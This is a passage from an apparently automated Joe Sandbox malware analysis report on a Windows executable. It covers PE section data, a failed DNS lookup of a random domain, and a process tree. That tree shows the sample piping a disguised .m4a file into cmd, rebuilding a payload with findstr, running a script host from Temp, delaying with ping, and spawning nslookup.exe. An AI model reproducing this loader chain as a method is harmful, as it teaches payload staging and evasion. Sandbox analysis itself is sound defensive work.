Icon Hash: f0ecd4d4d4dcd4d4

Static PE Info

General Entrypoint: 0x41badf

Copyright Joe Security LLC 2021 Page 12 of 18 General Entrypoint Section: .text Digitally signed: false Imagebase: 0x400000 Subsystem: windows gui Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED DLL Characteristics: Time Stamp: 0x56B8EE06 [Mon Feb 8 19:35:34 2016 UTC] TLS Callbacks: CLR (.Net) Version: OS Version Major: 4 OS Version Minor: 0 File Version Major: 4 File Version Minor: 0 Subsystem Version Major: 4 Subsystem Version Minor: 0 Import Hash: 650ed02ca4b6baad6b24f20402b6268b

Entrypoint Preview

Data Directories

Sections

Name Virtual Address Virtual Size Raw Size Xored PE ZLIB Complexity File Type Entropy Characteristics .text 0x1000 0x1b48a 0x1b600 False 0.60014447774 data 6.68441909824 IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ .rdata 0x1d000 0x4082 0x4200 False 0.453184185606 data 5.64476234082 IMAGE_SCN_CNT_INITIALIZED_DA TA, IMAGE_SCN_MEM_READ .data 0x22000 0x4c30 0x800 False 0.427734375 data 3.84196672305 IMAGE_SCN_CNT_INITIALIZED_DA TA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ .rsrc 0x27000 0x6155c 0x61600 False 0.384093689827 data 6.18503201203 IMAGE_SCN_CNT_INITIALIZED_DA TA, IMAGE_SCN_MEM_READ

Resources

Imports

Version Infos

Possible Origin

Language of compilation system Country where language is spoken Map

English United States

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Timestamp Source IP Dest IP Trans ID OP Code Name Type Class

Copyright Joe Security LLC 2021 Page 13 of 18 Timestamp Source IP Dest IP Trans ID OP Code Name Type Class Jun 24, 2021 05:56:31.408637047 CEST 192.168.2.5 8.8.8.8 0x35da Standard query PXBJECjdIH A (IP address) IN (0x0001) (0) vvfvACvVUZ ukUKtdaV.P XBJECjdIHv vfvACvVUZu kUKtdaV

DNS Answers

Timestamp Source IP Dest IP Trans ID Reply Code Name CName Address Type Class Jun 24, 2021 8.8.8.8 192.168.2.5 0x35da Name error (3) PXBJECjdIH none none A (IP address) IN (0x0001) 05:56:31.463387012 vvfvACvVUZ CEST ukUKtdaV.P XBJECjdIHv vfvACvVUZu kUKtdaV

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: As47eCZnpZ.exe PID: 6216 Parent PID: 5912

General

Start time: 05:56:21 Start date: 24/06/2021 Path: C:\Users\user\Desktop\As47eCZnpZ.exe Wow64 process (32bit): true Commandline: 'C:\Users\user\Desktop\As47eCZnpZ.exe' Imagebase: 0x400000 File size: 1521629 bytes MD5 hash: 93DF98DB8236868F5BD80EC14FE33A6C Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: low

File Activities Show Windows behavior

File Created

File Deleted

File Written

File Read

Copyright Joe Security LLC 2021 Page 14 of 18 Analysis Process: cmd.exe PID: 6424 Parent PID: 6216

General

Start time: 05:56:27 Start date: 24/06/2021 Path: C:\Windows\SysWOW64\cmd.exe Wow64 process (32bit): true Commandline: 'C:\Windows\System32\cmd.exe' /c cmd < Profonda.m4a Imagebase: 0x150000 File size: 232960 bytes MD5 hash: F3BDBE3BB6F734E357235F4D5898582D Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: high

File Activities Show Windows behavior

Analysis Process: conhost.exe PID: 6464 Parent PID: 6424

General

Start time: 05:56:27 Start date: 24/06/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: high

Analysis Process: cmd.exe PID: 6516 Parent PID: 6424

General

Start time: 05:56:28 Start date: 24/06/2021 Path: C:\Windows\SysWOW64\cmd.exe Wow64 process (32bit): true Commandline: cmd Imagebase: 0x150000 File size: 232960 bytes MD5 hash: F3BDBE3BB6F734E357235F4D5898582D Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: high

File Activities Show Windows behavior

File Created

File Written

Copyright Joe Security LLC 2021 Page 15 of 18 File Read

Analysis Process: findstr.exe PID: 6532 Parent PID: 6516

General

Start time: 05:56:28 Start date: 24/06/2021 Path: C:\Windows\SysWOW64\findstr.exe Wow64 process (32bit): true Commandline: findstr /V /R '^ZHdrmMsYFJiRDNmGpRonwXdHHcnPYBUAWuOMQZMASfNOcQYMlNcHC FhwsJvrhBqrOHUvZMPlyIGLlBkQvMElyhYdTMciCIjdfJZ$' Folle.m4a Imagebase: 0x1380000 File size: 29696 bytes MD5 hash: 8B534A7FC0630DE41BB1F98C882C19EC Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: moderate

File Activities Show Windows behavior

File Written

Analysis Process: Bel.exe.com PID: 6552 Parent PID: 6516

General

Start time: 05:56:29 Start date: 24/06/2021 Path: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bel.exe.com Wow64 process (32bit): true Commandline: Bel.exe.com R Imagebase: 0x7ff797770000 File size: 893608 bytes MD5 hash: C56B5F0201A3B3DE53E561FE76912BFD Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: moderate

File Activities Show Windows behavior

File Read

Analysis Process: PING.EXE PID: 6564 Parent PID: 6516

General

Start time: 05:56:29 Start date: 24/06/2021 Path: C:\Windows\SysWOW64\PING.EXE Wow64 process (32bit): true Commandline: ping 127.0.0.1 -n 30 Imagebase: 0xe30000 File size: 18944 bytes MD5 hash: 70C24A306F768936563ABDADB9CA9108

Copyright Joe Security LLC 2021 Page 16 of 18 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: high

File Activities Show Windows behavior

Analysis Process: Bel.exe.com PID: 6600 Parent PID: 6552

General

Start time: 05:56:30 Start date: 24/06/2021 Path: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bel.exe.com Wow64 process (32bit): true Commandline: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bel.exe.com R Imagebase: 0x10e0000 File size: 893608 bytes MD5 hash: C56B5F0201A3B3DE53E561FE76912BFD Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: moderate

File Activities Show Windows behavior

File Deleted

File Read

Analysis Process: nslookup.exe PID: 4532 Parent PID: 6600

General

Start time: 05:58:16 Start date: 24/06/2021 Path: C:\Windows\SysWOW64\nslookup.exe Wow64 process (32bit): true Commandline: C:\Windows\SysWOW64\nslookup.exe Imagebase: 0xc40000 File size: 78336 bytes MD5 hash: 8E82529D1475D67615ADCB4E1B8F4EEC Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: moderate

Registry Activities Show Windows behavior

Key Created

Key Value Created

Disassembly

Code Analysis Copyright Joe Security LLC 2021 Page 17 of 18 Copyright Joe Security LLC Joe Sandbox Cloud Basic 32.0.0 Black Diamond

Copyright Joe Security LLC 2021 Page 18 of 18